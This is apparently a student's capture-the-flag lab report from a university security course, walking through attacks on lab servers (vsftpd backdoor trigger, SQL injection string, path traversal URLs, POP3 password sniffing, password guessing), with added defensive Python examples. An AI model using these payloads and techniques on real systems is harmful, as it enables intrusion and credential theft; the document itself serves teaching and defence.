VUT Brno – Faculty of Information Technology
Information Systems Security (BIS) – 2015/2016
Project 1 – Mystery of BIS
František Němec ([email protected])
2 December 2015
1 Smith's secret (A)
I log in over ssh with the private key.

    [stud@xnemec61 ~]$ cd ..
    [stud@xnemec61 ~]$ ls
    smith  stud

Another user, "smith", who will turn out to be important. What about the zsnes binary?

    [stud@xnemec61 ~]$ strings zsnes
    ...
    I'm only a dummy for BIS project...    (suggests the file will be important)
    su - smith                             (smith again, what a coincidence, and even su)
    ...

I decompile the code with Boomerang [1]. One branch contains a call to system(), so I try to trigger it.

    ...
    } else {
        system();
        eax = 0;
    }
    } else {
    ...

I try running it under a debugger. First I find the address to jump to from objdump.

    $ objdump -d zsnes
    ...
     804869f:  74 13                   je     80486b4 <main+0x1e0>
     80486a1:  c7 04 24 8b 8a 04 08    movl   $0x8048a8b,(%esp)
     80486a8:  e8 0b fd ff ff          call   80483b8 <system@plt>
     80486ad:  b8 00 00 00 00          mov    $0x0,%eax
    ...

    $ gdb zsnes
    (gdb) break main
    (gdb) run
    (gdb) set $pc = 0x80486a1
    (gdb) n
    su: uživatel smith neexistuje

[1] http://boomerang.sourceforge.net/
Good, but I will have to modify the binary and run it directly on the server. From objdump I find where main starts in the binary and where the call to system() is located. I skip everything from the start up to the movl before the system() call (by inserting NOPs). I copy the modified binary to the server and run it. I am logged in as smith, with the first secret and access to nmap. Later I found out that a plain su - smith is enough and the complicated procedure above was unnecessary.

    [smith@xnemec61 ~]$ ls
    secret.txt  nmap
    [smith@xnemec61 ~]$ cat secret.txt
    Ziskali jste tajemstvi "A:17:11:02:00:01:0cd279c7d8..."
2 Network mapping (NMap)
Finding the network address:

    [smith@xnemec61 ~]$ ifconfig
    ...
    inet addr:192.168.122.205  Bcast:192.168.122.255  Mask:255.255.255.0
    ...
Mapping the network:

    [smith@xnemec61 ~]$ sudo nmap -sP 192.168.122.0/24

Too many entries for the connected users' machines. The entries with ptest look interesting.

    [smith@xnemec61 ~]$ sudo nmap -sP 192.168.122.0/24 | grep ptest
    Nmap scan report for ptest3.local (192.168.122.50)
    Nmap scan report for ptest1.local (192.168.122.54)
    Nmap scan report for ptest2.local (192.168.122.98)
    Nmap scan report for ptest4.local (192.168.122.230)
Mapping the services of the individual servers:

    [smith@xnemec61 ~]$ sudo nmap -sS -sV 192.168.122.50
    22/tcp    open  ssh    OpenSSH 5.3 (protocol 2.0)
    80/tcp    open  http   Apache httpd 2.2.15 ((CentOS))

    [smith@xnemec61 ~]$ sudo nmap -sS -sV 192.168.122.54
    21/tcp    open  ftp    vsftpd 2.3.4
    22/tcp    open  ssh    OpenSSH 5.3 (protocol 2.0)
    80/tcp    open  http   Apache httpd 2.2.15 ((CentOS))
    3306/tcp  open  mysql  MySQL (unauthorized)

    [smith@xnemec61 ~]$ sudo nmap -sS -sV 192.168.122.98
    22/tcp    open  ssh    OpenSSH 5.3 (protocol 2.0)
    110/tcp   open  pop3   Dovecot pop3d
    55555/tcp open  http   Apache httpd

    [smith@xnemec61 ~]$ sudo nmap -sS -sV 192.168.122.230
    22/tcp    open  ssh    OpenSSH 5.3 (protocol 2.0)
    80/tcp    open  http   Apache httpd 2.2.15 ((CentOS))
3 FTP backdoor (B)
Server ptest1 runs ftp with a backdoor [2]. Connecting over telnet:

    [smith@xnemec61 ~]$ telnet 192.168.122.54 21
    Trying 192.168.122.54...
    Connected to 192.168.122.54.
    Escape character is '^]'.
    220 (vsFTPd 2.3.4)
    USER x:)
    331 Please specify the password.
    PASS
    220 Opened port 58874, take a look ;)

    telnet 192.168.122.54 58874
    Trying 192.168.122.54...
    Connected to 192.168.122.54.
    Escape character is '^]'.
    -----BEGIN RSA PRIVATE KEY-----
    MIIEpAIBAAKCAQEAxXRaP2hoSg1twOly6p7VMILraMxWNEjj6ZS17gOZysyy42OI
    bWXhkAMUwh+IkMSsRNKQm3MSsObrMELRq2P1afiQ8pNfFIHKa9LQ2h+NjwaLLbz6
    ...
    EBbW8ACoREMr4QxLFqRzHFCdady/nrmIxZIfiZ7mkA3K5IvApWIhs43SHzMhFAEI
    ZUuvciHkkGYlNckBUbTA6+ox9ThSNlwb+ILrF7DGJelE4GjfdMkDFQ==
    -----END RSA PRIVATE KEY-----
    500 OOPS: Bye Bye.
    Connection closed by foreign host.

I use the private key for an ssh connection to one of the servers... ptest1 works:

    [stud@xnemec61 ~]$ ssh -4 -i id_rsa_54 smith@ptest1
    Welcome smith!
    Last login: Tue Nov 24 12:36:56 2015 from xsarca00.local
    [smith@ptest1 ~]$ ls
    file.pcap  secret.txt  tcpdump  telnet
    [smith@ptest1 ~]$ cat secret.txt
    Ziskali jste tajemstvi "B:24:11:12:57:01:376a6bcb68..."
4 SQL injection (C)
Connecting to the http server on ptest1:

    [stud@xnemec61 ~]$ elinks http://ptest1

Using the login [email protected] and the password ' OR '1'='1:

    Ziskali jste tajemstvi "C:24:11:14:37:01:1355934b75..."
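The bypass above works because the submitted password is spliced into the SQL text. The following added Python/SQLite example (mine, not part of the report or of the ptest1 application) puts the concatenated query beside its parameterized form and runs both against a constructed user table.

```python
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the login database on ptest1."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (email TEXT, password TEXT)")
    con.execute("INSERT INTO users VALUES ('alice@example.test', 'correct horse')")
    return con


def login_vulnerable(con, email, password):
    """Query built by string concatenation: a quote in the input becomes SQL syntax."""
    sql = ("SELECT COUNT(*) FROM users WHERE email = '" + email
           + "' AND password = '" + password + "'")
    # With password  ' OR '1'='1  the WHERE clause becomes
    #   email = '...' AND password = '' OR '1'='1'   -> true for every row
    return con.execute(sql).fetchone()[0] > 0


def login_safe(con, email, password):
    """Same check with bound parameters: the driver never parses the input as SQL."""
    sql = "SELECT COUNT(*) FROM users WHERE email = ? AND password = ?"
    return con.execute(sql, (email, password)).fetchone()[0] > 0


def demo():
    """Run both variants against the report's payload and against real credentials."""
    con = make_db()
    payload = "' OR '1'='1"
    return {
        "vulnerable, payload": login_vulnerable(con, "nobody@example.test", payload),
        "vulnerable, wrong pw": login_vulnerable(con, "alice@example.test", "wrong"),
        "safe, payload": login_safe(con, "nobody@example.test", payload),
        "safe, real creds": login_safe(con, "alice@example.test", "correct horse"),
    }


if __name__ == "__main__":
    for case, ok in demo().items():
        print("%-22s login %s" % (case, "accepted" if ok else "rejected"))
```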
5 Weak password (D)
Connecting to the http server on ptest2 (this time on a non-standard port).

    [stud@xnemec61 ~]$ elinks http://ptest2:55555

Using the login admin and the password 123456.

    Ziskali jste tajemstvi "D:24:11:17:09:01:62e18d7bb2..."

[2] https://xorl.wordpress.com/2011/07/05/vsftpd-2-3-4-backdoor/
6 Interception of POP3 login credentials (E)
Analysis of the POP3 packets passing over the network:

    [smith@ptest1 ~]$ sudo tcpdump -X port pop3
    ...
    18:17:43.854819 IP ptest1.local.39432 > ptest2.local.pop3: Flags [P.], seq 7:19, ...
            0x0000:  4500 0040 2ed0 4000 4006 95fe c0a8 7a36  E..@..@.@.....z6
            0x0010:  c0a8 7a62 9a08 006e 0694 b99d a7e1 91d2  ..zb...n........
            0x0020:  8018 0391 3633 0000 0101 080a 6dd3 9769  ....63......m..i
            0x0030:  6dba 15b3 5553 4552 2073 6d69 7468 0d0a  m...USER.smith..
    ...
    18:17:43.855384 IP ptest1.local.39432 > ptest2.local.pop3: Flags [P.], seq 19:34, ...
            0x0000:  4500 0043 2ed1 4000 4006 95fa c0a8 7a36  E..C..@.@.....z6
            0x0010:  c0a8 7a62 9a08 006e 0694 b9a9 a7e1 91d7  ..zb...n........
            0x0020:  8018 0391 c9f2 0000 0101 080a 6dd3 976a  ............m..j
            0x0030:  6dba 15b4 5041 5353 2071 4277 5a48 7a4c  m...PASS.qBwZHzL
            0x0040:  310d 0a                                  1..
    ...

Connecting to the POP3 server with the captured login and password (the e-mail contains secret E):

    [stud@xnemec61 ~]$ telnet ptest2 pop3
    Trying 192.168.122.98...
    Connected to ptest2.
    Escape character is '^]'.
    +OK Dovecot ready.
    USER smith
    +OK
    PASS qBwZHzL1
    +OK Logged in.
    LIST
    +OK 1 messages:
    1 505
    .
    RETR 1
    +OK 505 octets
    Return-Path:
    X-Original-To: smith@localhost
    Delivered-To: [email protected]
    Received: by BIS-ptest2.bis.com (Postfix, from userid 0)
            id 433495C10; Tue,  3 Nov 2015 20:43:11 +0100 (CET)
    Message-Id: <[email protected]>
    Date: Tue,  3 Nov 2015 20:43:11 +0100 (CET)
    From: [email protected] (root)
    To: undisclosed-recipients:;

    Ziskali jste tajemstvi "E:03:11:20:43:01:d4fbac02b5..."
    .
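From the defender's side, the capture above is exactly what a network sensor should alert on. The following added Python example (mine, not part of the report) re-parses the tcpdump -X output shown above (SAMPLE_CAPTURE holds those two packets), strips the IP and TCP headers using their own length fields, and flags POP3 USER/PASS commands crossing the wire in clear, masking the password in its report.

```python
import re

SAMPLE_CAPTURE = """\
18:17:43.854819 IP ptest1.local.39432 > ptest2.local.pop3: Flags [P.], seq 7:19, ...
        0x0000:  4500 0040 2ed0 4000 4006 95fe c0a8 7a36  E..@..@.@.....z6
        0x0010:  c0a8 7a62 9a08 006e 0694 b99d a7e1 91d2  ..zb...n........
        0x0020:  8018 0391 3633 0000 0101 080a 6dd3 9769  ....63......m..i
        0x0030:  6dba 15b3 5553 4552 2073 6d69 7468 0d0a  m...USER.smith..
18:17:43.855384 IP ptest1.local.39432 > ptest2.local.pop3: Flags [P.], seq 19:34, ...
        0x0000:  4500 0043 2ed1 4000 4006 95fa c0a8 7a36  E..C..@.@.....z6
        0x0010:  c0a8 7a62 9a08 006e 0694 b9a9 a7e1 91d7  ..zb...n........
        0x0020:  8018 0391 c9f2 0000 0101 080a 6dd3 976a  ............m..j
        0x0030:  6dba 15b4 5041 5353 2071 4277 5a48 7a4c  m...PASS.qBwZHzL
        0x0040:  310d 0a                                  1..
"""
HEX_LINE = re.compile(r"^\s+0x[0-9a-f]{4}:")           # indented hex-dump row
CLEAR_AUTH = re.compile(rb"^(USER|PASS) (\S+)\r?\n")   # POP3 cleartext login commands

def parse_packets(text):
    """Group tcpdump -X output into (header line, raw IP bytes) pairs."""
    packets = []
    for block in re.split(r"(?m)^(?=\S)", text):  # a new packet starts at column 0
        lines = block.splitlines()
        if not lines:
            continue
        # column layout: "0x0030:  <hex bytes>  <ascii>", separated by 2+ spaces
        hexcols = [re.split(r"\s{2,}", l.strip())[1] for l in lines[1:] if HEX_LINE.match(l)]
        packets.append((lines[0].strip(), bytes.fromhex("".join(hexcols).replace(" ", ""))))
    return packets

def tcp_payload(pkt):
    """Strip the IPv4 and TCP headers using their own length fields."""
    ihl = (pkt[0] & 0x0F) * 4 if pkt else 0
    if len(pkt) < ihl + 20 or pkt[0] >> 4 != 4 or pkt[9] != 6:  # IPv4 carrying TCP only
        return b""
    total = int.from_bytes(pkt[2:4], "big")
    doff = (pkt[ihl + 12] >> 4) * 4
    return pkt[ihl + doff:total]

def find_cleartext_logins(text):
    """Return (flow, command, argument) for every POP3 USER/PASS sent unencrypted."""
    hits = []
    for header, pkt in parse_packets(text):
        m = CLEAR_AUTH.match(tcp_payload(pkt))
        if m:
            cmd, arg = m.group(1).decode(), m.group(2).decode()
            if cmd == "PASS":
                arg = "*" * len(arg)  # record that a password crossed the wire, never its value
            hits.append((header.split(" IP ", 1)[1].split(":")[0], cmd, arg))
    return hits
```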
7 Social network (F)
Connecting to the ptest3 http server:

    [stud@xnemec61 ~]$ elinks http://ptest3

One of the doctoral students wrote an interesting post:

    Maroš Barabas @ibarabas
    A hacking curiosity: do you know how much information can be found out about people from their social networks? People often even write down their passwords. :)

I try to find the doctoral students on Facebook. "Maros Barabas" [3] has something useful:

    If you are looking for some info, try @fitbis. If you don't understand this, don't comment. Thanks.

The @ in front of fitbis points to Twitter [4]:

    If you got all the way here, you are probably looking for some info: my name is Abdulah, I have brown eyes, 126 cm (in circumference) and my dog is called Charlie.

I try to log in as one of the doctoral students. The user ibarabas gave away a password hint (the name of his dog):

    Invalid password! Hint: Jmeno meho psa

Entering the doctoral students' network with the login ibarabas and the password charlie:

    Ziskali jste tajemstvi "F:28:11:13:40:01:f3706520fb..."
8 Path traversal (G)
Connecting to the ptest4 http server:

    [stud@xnemec61 ~]$ elinks http://ptest4
    http://192.168.122.230/index.php?dir=/home/data/web/shared

Entering the server's home directory (via elinks):

    http://192.168.122.230/index.php?dir=/home/
    data  martin  pavel  radek

Radek's directory contains the secret:

    http://192.168.122.230/index.php?dir=/home/radek/secret.txt
    Ziskali jste tajemstvi "G:24:11:18:52:01:9739dafa6f..."
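The index.php above uses whatever absolute path arrives in dir, which is why /home/ and /home/radek/secret.txt are readable through it. As an added Python illustration (mine, not the report's or the server's code), the following puts that behaviour beside a check that resolves every request inside a fixed web root, on a constructed directory tree that also contains a symlink pointing outside the root.

```python
import os
import shutil
import tempfile


def build_demo_tree():
    """Constructed layout modelled on ptest4: web root below a home dir, plus a symlink escape."""
    home = tempfile.mkdtemp()
    shared = os.path.join(home, "data", "web", "shared")
    os.makedirs(os.path.join(shared, "docs"))
    os.makedirs(os.path.join(home, "radek"))
    for path in ("data/web/shared/docs/readme.txt", "radek/secret.txt"):
        with open(os.path.join(home, path), "w") as f:
            f.write("constructed file\n")
    os.symlink(os.path.join(home, "radek"), os.path.join(shared, "link"))
    return home, shared


def list_dir_vulnerable(requested):
    """Like the index.php above: the dir parameter is used as the path, unchecked."""
    return sorted(os.listdir(requested))


def list_dir_safe(webroot, requested):
    """Resolve the request relative to the web root and refuse anything that escapes it.

    realpath() canonicalises '..' segments and follows symlinks before the check,
    and commonpath() avoids the classic prefix-string bug ('/root' vs '/root2').
    """
    root = os.path.realpath(webroot)
    target = os.path.realpath(os.path.join(root, requested))  # an absolute input replaces root
    if os.path.commonpath([root, target]) != root:
        raise PermissionError("request escapes the web root: %r" % requested)
    return sorted(os.listdir(target))


def demo():
    """Compare both variants on the report's /home/ request and on two other escapes."""
    home, shared = build_demo_tree()
    try:
        results = {"vulnerable /home/": list_dir_vulnerable(home)}
        for req in ("docs", "/home/", "../../../radek", "link"):
            try:
                results[req] = list_dir_safe(shared, req)
            except PermissionError:
                results[req] = "blocked"
        return results
    finally:
        shutil.rmtree(home)
```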
9 PDF metadata (I)
Pavel's directory contains an interesting e-mail together with a pdf document:

    http://192.168.122.230/index.php?file=/home/pavel/1445685669.Vfd00I5a3fM694032.unknown:2,S
    ...
    Hi, I have finished the document. I'm sending it to you as an attachment. There is no information in the text that would point to me as the author, as we agreed. But check it, just to be sure.

The content of the pdf document itself is not interesting, but the metadata is more so, especially the keywords:

    http://192.168.122.230/index.php?file=/home/pavel/Document.pdf
    ...
    /Keywords(Ziskali jste tajemstvi "I:03:11:13:13:35:a283eae6d3...")
    ...
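The leak above sits in the PDF's document information dictionary, which is plain text in the file and is what the /Keywords line comes from. As an added Python example (mine, not the report's), the following reads that dictionary from a constructed minimal PDF and lists the fields an author would want cleared before a document is supposed to be anonymous; it handles literal and hex strings but not compressed object streams or nested unescaped parentheses.

```python
import re

# Constructed minimal PDF whose Info dictionary carries identifying metadata.
SAMPLE_PDF = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj
2 0 obj << /Type /Pages /Kids [] /Count 0 >> endobj
3 0 obj
<< /Title (Report) /Author (pavel) /Producer <506861 6e746f6d>
   /Keywords (constructed \\(sample\\) keyword) /ModDate (D:20151103131335) >>
endobj
trailer << /Root 1 0 R /Info 3 0 R >>
%%EOF
"""

# /Key followed by a literal string (...) or a hex string <...>
ENTRY = re.compile(rb"/(\w+)\s*(?:\(((?:\\.|[^\\)])*)\)|<([0-9A-Fa-f\s]*)>)")


def pdf_info_dict(data):
    """Follow the trailer's /Info reference and return that object's string entries."""
    ref = re.search(rb"/Info\s+(\d+)\s+(\d+)\s+R", data)
    if not ref:
        return {}
    obj = re.search(rb"(?s)\b%s\s+%s\s+obj\s*(.*?)\s*endobj" % ref.groups(), data)
    if not obj:
        return {}
    info = {}
    for m in ENTRY.finditer(obj.group(1)):
        key, literal, hexstr = m.group(1), m.group(2), m.group(3)
        if literal is not None:
            # undo the escapes that matter here: \( \) and \\
            info[key] = re.sub(rb"\\([()\\])", rb"\1", literal)
        else:
            info[key] = bytes.fromhex(hexstr.decode())
    return info


def leaky_fields(info):
    """Entries that identify the author or tooling and should be cleared before publishing."""
    watch = (b"Author", b"Keywords", b"Subject", b"Title", b"Creator", b"Producer")
    return {k.decode(): v.decode("latin-1") for k, v in info.items() if k in watch and v.strip()}


if __name__ == "__main__":
    for field, value in leaky_fields(pdf_info_dict(SAMPLE_PDF)).items():
        print("%-9s %s" % (field, value))
```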
[3] https://www.facebook.com/mbarabas
[4] http://www.twitter.com/fitbis